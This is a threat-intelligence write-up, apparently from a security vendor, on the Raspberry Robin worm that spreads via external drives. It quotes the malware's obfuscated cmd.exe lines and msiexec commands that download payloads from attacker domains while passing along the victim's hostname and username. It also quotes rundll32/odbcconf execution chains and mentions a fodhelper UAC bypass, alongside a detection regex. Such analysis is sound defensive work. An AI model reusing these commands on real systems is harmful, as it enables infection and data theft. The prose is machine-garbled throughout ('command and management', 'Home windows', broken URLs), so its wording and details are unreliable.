Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks

Introduction

Throughout our risk searching workouts in latest months, we’ve began to watch a distinguishing sample of msiexec.exe utilization throughout totally different endpoints. As we drilled all the way down to particular person property, we discovered traces of a lately found malware known as Raspberry Robin. The RedCanary Analysis Crew first coined the identify for this malware of their weblog publish, and Sekoia revealed a Flash Report in regards to the exercise underneath the identify of QNAP Worm. Each articles provide nice evaluation of the malware’s conduct. Our findings help and enrich prior analysis on the subject.

Execution Chain

Raspberry Robin is a worm that spreads over an exterior drive. After preliminary an infection, it downloads its payload by msiexec.exe from QNAP cloud accounts, executes its code by rundll32.exe, and establishes a command and management (C2) channel by TOR connections.

Let’s walkthrough the steps of the kill-chain to see how this malware capabilities.

Supply and Exploitation

Raspberry Robin is delivered by contaminated exterior disks. As soon as connected, cmd.exe tries to execute instructions from a file inside that disk. This file is both a .lnk file or a file with a selected naming sample. Recordsdata with this sample exhibit a 2 to five character identify with an often obscure extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. Additionally, the attacker makes use of an extreme quantity of whitespace/non printable characters and altering letter case to keep away from string matching detection methods. Instance command traces embody:

• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /R C:WINDOWSsystem32cmd.exe<Gne.Swy

File pattern for supply may be discovered on this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations

Subsequent, we observe explorer.exe operating with an obscure command line argument, spawned by a earlier occasion of cmd.exe. This obscure argument appears to take the identify of an contaminated exterior drive or .lnk file that was beforehand executed. A number of the samples had values together with USB, USB DISK, or USB Drive, whereas another samples had extra particular names. On each occasion of explorer.exe we see that the adversary is altering the letter case to keep away from detection:

• ExPLORer [redacted]
• exploREr [redacted]
• ExplORER USB Drive
• eXplorer USB DISK

Set up

After supply and preliminary execution, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. It makes use of -q or /q along with commonplace set up parameter to function quietly. As soon as once more, blended case letters are used to bypass detection:

• mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
• mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
• MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
• mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
• msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
• MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you’ll be able to see above, URLs used for payload obtain have a selected sample. Domains use 2 to 4 character names with obscure TLDs together with .xyz, .hk, .information, .pw, .cx, .me, and extra. URL paths have a single listing with a random string 11 characters lengthy, adopted by hostname and the username of the sufferer. On community telemetry, we additionally noticed the Home windows Installer person agent because of the utilization of msiexec.exe. To detect Raspberry Robin by its URL sample, use this regex:

^http[s]{0,1}://[a-zA-Z0-9]{2,4}.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|?).*?$

If we glance up the WHOIS info for given domains, we see area registration dates going way back to February 2015. We additionally see a rise on registered domains ranging from September 2021, which aligns with preliminary observations of Raspberry Robin by our friends.

Desk 1: Distribution of area creation dates over time

Related domains have SSL certificates with the topic different identify of q74243532.myqnapcloud.com, which factors out the underlying QNAP cloud infra. Additionally, their URL scan outcomes return login pages to QTS service of QNAP:

As soon as the payload is downloaded, it’s executed by numerous system binaries. First, rundll32.exe makes use of the ShellExec_RunDLL perform from shell32.dll to leverage system binaries comparable to msiexec.exe, odbcconf.exe, or management.exe. These binaries are used to execute the payload saved in C:ProgramData[3 chars]

• C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
• C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a {regsvr C:ProgramDataTvbzhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
• exe SHELL32,ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a {regsvr C:ProgramDataEuoikdvnbb.xml.}
• C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.

It’s adopted by the execution of fodhelper.exe, which has the auto elevated bit set to true. It’s usually leveraged by adversaries as a way to bypass Person Account Management and execute extra instructions with escalated privileges [3]. To observe suspicious executions of fodhelper.exe, we propose monitoring its cases with none command line arguments.

Command and Management

Raspberry Robin units up its C2 channel by the extra execution of system binaries with none command line argument, which is sort of uncommon. That possible factors to course of injection given elevated privileges in earlier steps of execution. It makes use of dllhost.exe, rundll32.exe, and regsvr32.exe to arrange a TOR connection.

Detection by World Menace Alerts

In Cisco World Menace Alerts obtainable by Cisco Safe Community Analytics and Cisco Safe Endpoint, we observe this exercise underneath the Raspberry Robin risk object. Picture 3 exhibits a detection pattern of Raspberry Robin:

Conclusion

Raspberry Robin tries to stay undetected by its use of system binaries, blended letter case, TOR-based C2, and abuse of compromised QNAP accounts. Though we now have related intelligence gaps (the way it infects exterior disks, what are its actions on goal) like our friends, we’re constantly observing its actions.

Indicators of Compromise

References

1. Raspberry Robin will get the worm early – https://redcanary.com/weblog/raspberry-robin/
2. QNAP worm: who advantages from crime? – https://7095517.fs1.hubspotusercontent-na1.internet/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
3. UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/

Share: